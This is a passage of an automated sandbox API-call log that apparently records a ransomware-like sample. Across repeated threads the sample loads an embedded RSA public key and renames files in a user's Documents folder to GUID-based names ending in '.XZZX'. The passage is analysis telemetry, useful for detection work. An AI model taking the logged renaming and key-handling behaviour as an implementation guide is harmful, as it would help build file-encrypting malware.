lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0103.809] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.809] SetErrorMode (uMode=0x1) returned 0x1 [0103.809] lstrcpyW (in: lpString1=0x420f860, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0103.809] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x45ba0b08, Data2=0x61bd, Data3=0x4813, Data4=([0]=0xb2, [1]=0xa, [2]=0x56, [3]=0xaf, [4]=0x6d, [5]=0xdf, [6]=0xab, [7]=0xec))) returned 0x0 [0103.809] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned 81 [0103.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.809] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8882CE81B84690745BA0B081FA54D4F.XZZX") returned 81 [0103.809] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 288 os_tid = 0x7f0 [0103.965] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.965] lstrcpyW (in: lpString1=0x420f460, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0103.965] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.965] SetErrorMode (uMode=0x1) returned 0x1 [0103.965] lstrcpyW (in: lpString1=0x420f860, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0103.965] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x2bc58075, Data2=0x9f8d, Data3=0x4f46, Data4=([0]=0xa6, [1]=0x77, [2]=0x6c, [3]=0xd3, [4]=0x13, [5]=0xe4, [6]=0xd1, [7]=0x6e))) returned 0x0 [0103.965] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B8F78CE2222013C8FF50021B265CF810.XZZX") returned 81 [0103.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.965] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C6906B713168238E2BC58075358907D6.XZZX") returned 81 [0103.966] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 289 os_tid = 0x318 [0104.120] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.120] lstrcpyW (in: lpString1=0x420f460, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0104.121] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.121] SetErrorMode (uMode=0x1) returned 0x1 [0104.121] lstrcpyW (in: lpString1=0x420f860, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0104.121] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6b7cc61a, Data2=0x4328, Data3=0x4931, Data4=([0]=0x88, [1]=0x2e, [2]=0xea, [3]=0x1f, [4]=0x7c, [5]=0x7d, [6]=0x62, [7]=0xdc))) returned 0x0 [0104.121] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned 81 [0104.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0104.121] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7357C210133342A86B7CC61A175426F0.XZZX") returned 81 [0104.121] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 290 os_tid = 0x5c4 [0104.277] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.277] lstrcpyW (in: lpString1=0x420f460, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0104.277] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.277] SetErrorMode (uMode=0x1) returned 0x1 [0104.277] lstrcpyW (in: lpString1=0x420f860, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0104.277] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb6945a1d, Data2=0xa704, Data3=0x410c, Data4=([0]=0x98, [1]=0x27, [2]=0x3e, [3]=0xde, [4]=0x80, [5]=0xc1, [6]=0x6f, [7]=0x7c))) returned 0x0 [0104.277] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BE3510781871306D58A0B1081C6A14B5.XZZX") returned 81 [0104.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0104.277] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A11A53742A6FD830B6945A1D2E90BC78.XZZX") returned 81 [0104.277] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 291 os_tid = 0x610 [0104.433] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.433] lstrcpyW (in: lpString1=0x420f460, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0104.433] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.433] SetErrorMode (uMode=0x1) returned 0x1 [0104.433] lstrcpyW (in: lpString1=0x420f860, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0104.433] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x52102a0a, Data2=0x10ec, Data3=0x4578, Data4=([0]=0xa7, [1]=0x44, [2]=0x6, [3]=0xbc, [4]=0x11, [5]=0xd8, [6]=0x88, [7]=0x8c))) returned 0x0 [0104.433] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D4132CC416066089C413F0DC1A1E44D1.XZZX") returned 81 [0104.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0104.433] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A987613804978AA052102A0A08B86EE8.XZZX") returned 81 [0104.433] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 292 os_tid = 0x484 [0104.589] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.589] lstrcpyW (in: lpString1=0x420f460, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0104.589] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.589] SetErrorMode (uMode=0x1) returned 0x1 [0104.589] lstrcpyW (in: lpString1=0x420f860, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0104.589] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8386b2b1, Data2=0xcb73, Data3=0x4b9a, Data4=([0]=0xa9, [1]=0x4, [2]=0x3e, [3]=0xc0, [4]=0xb8, [5]=0xa5, [6]=0x26, [7]=0xe7))) returned 0x0 [0104.589] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned 81 [0104.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0104.589] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E534A0833C15142E8386B2B14035F876.XZZX") returned 81 [0104.589] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 293 os_tid = 0x65c [0104.745] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.745] lstrcpyW (in: lpString1=0x420f460, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0104.745] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.745] SetErrorMode (uMode=0x1) returned 0x1 [0104.745] lstrcpyW (in: lpString1=0x420f860, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0104.745] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8c05aa67, Data2=0x6ccc, Data3=0x46e3, Data4=([0]=0xbe, [1]=0x5, [2]=0xdb, [3]=0xe4, [4]=0x74, [5]=0xd7, [6]=0x8, [7]=0x45))) returned 0x0 [0104.745] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D8B4FBC032E124E029E6603236DA0928.XZZX") returned 81 [0104.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0104.745] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8673E141E2040E48C05AA672241252C.XZZX") returned 81 [0104.745] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 294 os_tid = 0x608 [0104.901] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0104.901] lstrcpyW (in: lpString1=0x420f460, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0104.901] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0104.901] SetErrorMode (uMode=0x1) returned 0x1 [0104.901] lstrcpyW (in: lpString1=0x420f860, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0104.901] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5654aa34, Data2=0x34c6, Data3=0x4747, Data4=([0]=0x96, [1]=0x62, [2]=0x0, [3]=0x1a, [4]=0xd0, [5]=0x9b, [6]=0xd2, [7]=0x4f))) returned 0x0 [0104.901] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1CB2DE23002B20E4903A282342F9656.XZZX") returned 81 [0104.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0104.901] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F80E34380EB18CEA5654AA3412D27132.XZZX") returned 81 [0104.901] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 295 os_tid = 0x62c [0105.061] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.061] lstrcpyW (in: lpString1=0x420f460, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0105.061] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.061] SetErrorMode (uMode=0x1) returned 0x1 [0105.062] lstrcpyW (in: lpString1=0x420f860, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0105.062] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x2ba3b913, Data2=0x955e, Data3=0x4707, Data4=([0]=0x83, [1]=0xcb, [2]=0xcf, [3]=0xf3, [4]=0x76, [5]=0x36, [6]=0x93, [7]=0x9b))) returned 0x0 [0105.062] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: 